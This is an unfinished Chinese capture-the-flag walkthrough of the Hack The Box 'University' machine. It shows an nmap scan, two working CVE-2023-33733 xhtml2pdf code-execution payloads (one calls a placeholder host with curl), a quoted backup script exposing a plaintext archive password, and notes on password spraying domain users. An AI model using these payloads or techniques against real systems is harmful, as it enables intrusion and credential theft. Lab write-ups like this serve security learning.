[M] University [Undone]

Enum

Nmap scan

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.24.0
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 4B8EA3A7F1A92D888835020074BB5558
|_http-server-header: nginx/1.24.0
|_http-title: University
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-08 14:31:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
59453/tcp open  msrpc         Microsoft Windows RPC

Shell as User - wao

Tcp-80

注册一个用户，第一时间尝试注册教师用户，登陆失败，所以注册一个学生用户。

发现一个把个人信息导出为 PDF 的功能

查看属性可以了解到用的 xhtml2pdf 组件。通过搜索引擎找到了一个 RCE 漏洞 CVE-2023-33733。

https://github.com/c53elyas/CVE-2023-33733

这个 Github 仓库是用来测试 POC 的，运行 poc.py 相当于运行 payload，RCE 的部分在 system 中。

<para>
  <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('curl http://xxx.xxx.xxx.xxx/') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
	exploit
	</font>
</para>

这个 POC 测了几次都失败了，看到仓库下方还有另一种方案

这个是从 HTML 转化为 PDF 时 RCE 的 Payload，比较符合这个环境。

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

更新信息后，变成这个样子，说明各个标签都正常解析了，才能正常执行。

Enum

发现一个备份目录

$sourcePath = "C:\Web\University\db.sqlite3"
$destinationPath = "C:\Web\DB Backups\"
$7zExePath = "C:\Program Files\7-Zip\7z.exe"

$zipFileName = "DB-Backup-$(Get-Date -Format 'yyyy-MM-dd').zip"
$zipFilePath = Join-Path -Path $destinationPath -ChildPath $zipFileName
$7zCommand = "& `"$7zExePath`" a `"$zipFilePath`" `"$sourcePath`" -p'WebAO1337'"
Invoke-Expression -Command $7zCommand

这里可以看到备份文件的密码，这里可以喷射一下，先拿到所有域用户。

拿到了 wao 用户的密码，再遛一下狗子

可以看到 wao 没什么特殊的权限，不过他是在 WEB DEVELOPERS 组中

Shell as User =